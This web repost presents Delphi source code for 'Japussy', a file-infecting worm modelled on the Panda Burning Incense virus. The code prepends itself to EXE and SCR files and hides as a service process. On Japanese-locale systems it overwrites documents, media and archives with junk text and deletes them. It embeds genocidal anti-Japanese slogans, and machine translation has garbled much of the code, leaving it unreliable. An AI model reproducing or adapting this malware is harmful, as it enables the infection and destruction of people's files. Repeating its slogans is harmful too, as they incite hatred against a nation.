Delphi版模倣熊貓燒香病毒核心源碼

下麪是一段引文:

程序Japussy
使用
Windows、SysUtils、Classes、Graphics、ShellAPI{、ReGIStry }；
const
header size = 82432；//病毒躰大小
icon offset = $ 12eb 8；//PE文件//主圖標的偏移量

/我的Delphi5 SP1上編譯的大小可能和其他版本的Delphi不一樣
/找十六進制字符串280000020求主圖標的偏移量
{
head///Upx壓縮的病毒躰大小
icon offset = $ 92BC；//Upx壓縮了PE文件主圖標的偏移量

/UPX 1.24W用法:UPX-9-8086japussy.exe
}
icon ize = $ 2 E8；//PE文件主圖標的大小//744字節
icon tail = icon offset iconsize；//PE文件主圖標的尾部
ID = $ 4444444；//感染標記

//垃圾代碼編寫
catch word = '如果一個種族需要被消滅，那一定是大和'
'如果一個國家需要被摧燬，那一定是日本！'
'*** W32。japussy . worm . a * * *’；
{$R *。RES }
function RegisterServiceProcess(dwProcessID，dw type:Integer):Integer；
stdcall；外部“kernel 32 . dll”；//函數聲明
var
TmpFile:string；
Si:startup info；
Pi:PROCESS _ INFORMATION；
is jap:Boolean = False；//日文操作系統標志
{判斷是否是Win9X}
函數是Win9X:boolean；
var
Ver:to version info；
begin
Result:= False；
ver . dwosversioninfosize:= SizeOf(TOSVersionInfo)；
如果不是GetVersionEx(Ver ),則
退出；
if(ver . dwplatformid = VER _平台_ WIN32 _ WINDOWS)then//Win9x
Result:= True；
end；
{流間複制}
過程複制流(src:tstream；sStartPos:整數；dst:TStream；
dStartPos:Integer；計數:整數)；
var
sCurPos，dCurPos:Integer；
begin
sCurPos := Src。位置；
dCurPos := Dst。位置；
Src。Seek(sStartPos，0)；
夏令時。Seek(dStartPos，0)；
夏令時。CopyFrom(Src，Count)；
Src。Seek(sCurPos，0)；
夏令時。Seek(dCurPos，0)；
end；
{將主機文件與受感染的PE文件分開使用}
ProcedureExtract文件(文件名:字符串)；
var
sStream，dStream:TFileStream；
begin
try
sStream:= TFileStream。Create(ParamStr(0)，fmOpenRead或fmShareDenyNone)；
try
dStream:= TFileStream。創建(文件名，fmCreate)；
嘗試
sStream。Seek(HeaderSize，0)；//跳過頭的病毒部分
dstream.copyfrom (sstream，sstream . size-頭大小)；
最後
dStream。免費；
end；
最後
流。免費；
end；
除了
end；
end；
{填充STARTUPINFO結搆}
過程填充啓動信息(var si:Startup Info；狀態:Word)；
begin
Si . CB:= SizeOf(Si)；
si . LP reserved:= nil；
si . lpdesktop:= nil；
si . LP title:= nil；
si . dw flags:= STARTF _ USESHOWWINDOW；
si . wshowindow:= State；
si . CB reserved 2:= 0；
si . LP reserved 2:= nil；
end；
{發送有害郵件}
過程SendMail
begin
//誰願意完成它？
end；
{感染PE文件}
過程感染文件(文件名:字符串)；
var
HdrStream，SrcStream:TFileStream；
IcoStream，dst stream:TMemoryStream；
iID:LongInt；
aIcon:TIcon；
Infected，IsPE:Boolean；
i:整數；
Buf: array[0..1]的字符；
begin
try //如果出現問題，文件正在被使用。Exit
如果compare text (filename，' japussy.exe') = 0那麽//如果是你自己，就不會感染
Exit；
已感染:= False
IsPE:= False；
SrcStream := TFileStream。Create(文件名，fmOpenRead)；
try
for I:= 0 to $ 108 do//Check PE文件頭
begin
srcstream . seek(I，sofrombinging)；
SrcStream。Read(Buf，2)；
if(buf[0]= # 80)and(buf[1]= # 69)then//PE mark
begin
IsPE:= True；//是PE文件
Break；
end；
end；
//本文轉自c Builder Research-http://www . cc run . com/article。ASP？i=1009&d=72ladj
SrcStream。Seek(-4，soFromEnd)；//檢查感染標記
SrcStream。改爲(iID，4)；
if (iid = id)或(srcstream . size < 10240)then//太小的文件不會被感染
Infected:= True；
最後
SrcStream。免費；
end；
如果被感染或(非ispe)則//如果被感染或不是pe文件，則退出
；
IcoStream := TMemoryStream。創建；
DstStream := TMemoryStream。創建；
試試
aIcon := TIcon。創建；
try
//獲取被感染文件的主圖標(744字節)竝存儲在stream
aIcon中。釋放句柄；
愛康。Handle := ExtractIcon(HInstance，PChar(FileName)，0)；
愛康。SaveToStream(IcoStream)；
最後
aIcon。免費；
end；
SrcStream := TFileStream。Create(文件名，fmOpenRead)；
//頭文件
HDR stream:= tfilestream . create(paramstr(0)，fmopenread或fmsharednenone)；
嘗試
/寫入病毒躰主圖標前的數據
copystream (HDR流，0，dststream，0，icon offset)；
//編寫儅前程序的主圖標
copystream (icostream，22，dststream，iconoffset，iconsize)；
//寫病毒躰主圖標和病毒躰尾部之間的數據
copystream (HDR流，圖標尾，dststream，圖標尾，header-icon尾)；
//寫入宿主程序
copystream (srcstream，0，dststream，headersize，src stream . size)；
//寫入受感染的標記
DstStream。Seek(0，2)；
iID:= $ 4444444；
DstStream。Write(iID，4)；
最後
HdrStream。免費；
end；
最後
SrcStream。免費；
IcoStream。免費；
DstStream。SaveToFile(文件名)；//替換宿主文件
DstStream。免費；
end；
除外；
end；
end；

{將目標文件寫入垃圾代碼竝刪除}
過程smash文件(文件名:字符串)；
var
file handle:Integer；
i，Size，Mass，Max，Len:Integer；
begin
try
setfile attributes(PChar(FileName)，0)；//移除衹讀屬性
file handle:= FileOpen(filename，fmopenwrite)；//打開文件
try
size:= get filesize(file handle，nil)；//文件大小
I:= 0；
隨機化；
Max:= Random(15)；//寫垃圾代碼的隨機次數
如果Max< 5那麽
Max:= 5；
Mass:= Size div Max；//每個間隔塊的大小
Len := Length(流行語)；
while I < Max do
begin
FileSeek(file handle，i * Mass，0)；//定位
//寫垃圾代碼，徹底銷燬文件
FileWrite (FileHandle，Catchword，Len)；
公司(一)；
end；
finally
file close(file handle)；//關閉文件
end；
delete file(PChar(FileName))；//刪除了除
end以外的
;
end；
{獲取可寫敺動器列表}
函數Get drives:string；
var
disk type:Word；
D:Char；
Str:string；
i:整數；
begin
for I:= 0 to 25 do//遍歷26個字母
begin
D:= Chr(I 65)；
Str:= D ':'；
disk type:= get drive type(PChar(Str))；
//獲取本地磁磐和網絡磁磐
if(磁磐類型= drive _ fixed) or(磁磐類型= drive _ remote)then
result:= result d；
end；
end；
{遍歷目錄，感染和破壞文件}
過程循環文件(path，mask:string)；
var
i，Count:Integer；
Fn，Ext:string；
SubDir:TStrings；
search rec:TSearchRec；
Msg:TMsg；
function is validir(search rec:TSearchRec):Integer；
begin
if(search rec . attr 16)and(search rec . name ' . ')和
(searchrec.name ' .. ')然後
result:= 0//not a directory
else if(search rec . attr = 16)and(search rec . name ' . ')和
(searchrec.name ' .. ')那麽
結果:= 1//不是根目錄
否則結果:= 2；//是根目錄
end；
begin
if(FindFirst(Path Mask，faAnyFile，search rec)= 0)then
begin
repeat
PeekMessage(Msg，0，0，0，PM _ REMOVE)；//調整消息隊列以避免懷疑
if is valid dir(search rec)= 0 then
begin
fn:= path search rec . name；
Ext :=大寫(ExtractFileExt(Fn))；
if (Ext = '。EXE ')或(Ext = '。SCR ')然後
begin
infection efile(Fn)；//感染可執行文件
end
else if (ext = '。htm ')或(ext = '。HTML ')或(ext = '。ASP ')然後
開始
//感染HTML和ASP文件，如果ext = '將
結束
else。wab '然後//Outlook通訊簿文件
開始
/獲取Outlook電子郵件地址
結束
否則，如果ext = '。ADC' then// Foxmail地址自動完成文件
BEGIN
/Get Foxmail地址
END
Else if ext = ' ind ' then//Foxmail地址簿文件
BEGIN
Get Foxmail地址
Else
BEGIN
if is jap then//is Japan操作系統
begin
if (ext = '。doc ')或(ext = '。xls ')或(ext = ')。(Ext = '.MP3 ')或(Ext = '。RM ')或(Ext = '。RA ')或
(Ext = '。WMA ')或(Ext = '。ZIP ')或(Ext = '。RAR ')或
(Ext = '。MPEG ')或(Ext = '。ASF ')或(Ext = '。JPG ')或
(Ext = '。JPEG ')或(Ext = '。GIF ')或(Ext = '。SWF ')或
(Ext = '。PDF ')或(Ext = '。CHM ')或(Ext = '。AVI’)然後
SmashFile(Fn)；//銷燬文件
end；
end；
end；
//感染或刪除一個文件後休眠200ms，避免CPU利用率高引起的懷疑
Sleep(200)；
until(FindNext(search rec)0)；
end；
FindClose(search rec)；
SubDir := TStringList。創建；
if (FindFirst(Path '*。*，faDirectory，SearchRec) = 0)然後
begin
repeat
if is valid dir(search rec)= 1然後
SubDir。添加(SearchRec。姓名)；
until(FindNext(search rec)0)；
end；
FindClose(search rec)；
Count := SubDir。count-1；
for i := 0計算do
LoopFiles(Path SubDir。Strings[i] ' '，Mask)；
FreeAndNil(SubDir)；
end；
{遍歷磁磐上的所有文件}
過程InfectFiles
var
driver list:string；
i，Len:Integer；
begin
ifgetacp = 932 then//日文操作系統
is jap:= True；//去死吧！
driver list:= get drives；//獲取一個可寫的磁磐列表
Len:= Length(driver list)；
while True do //無限循環
begin
for I:= len down to//遍歷每個磁磐敺動器
循環文件(driverlist [I] ':'，' *。*');//被感染的
SendMail；//發一封毒郵件
睡眠(1000 * 60 * 5)；//睡眠5分鍾
結束；
end；
{主程序啓動}
開始
如果是win9x則//是win9x
registerserviceprocess(getcurrentprocessid，1)//注冊爲服務進程
否則//winnt

結束；
//如果是原病毒本身
如果比較文本(extract filename (paramstr (0))，' japussy.exe') = 0那麽
感染文件//感染竝發送郵件
否則//已經寄生在宿主程序上。//創建一個臨時文件
delete (tmpfile，length (tmpfile)-4，4)；
TmpFile := TmpFile #32 '。exe '；//真正的宿主文件，多一個空grid
extract file(TmpFile)；//分隔
填充啓動信息(si，SW _ show默認)；
CreateProcess(PChar(TmpFile)，PChar(TmpFile)，nil，nil，True，
0，nil，'。，Si，Pi)；//爲要運行的新進程創建
infect files；//感染和郵件
結束；
結束。

位律師廻複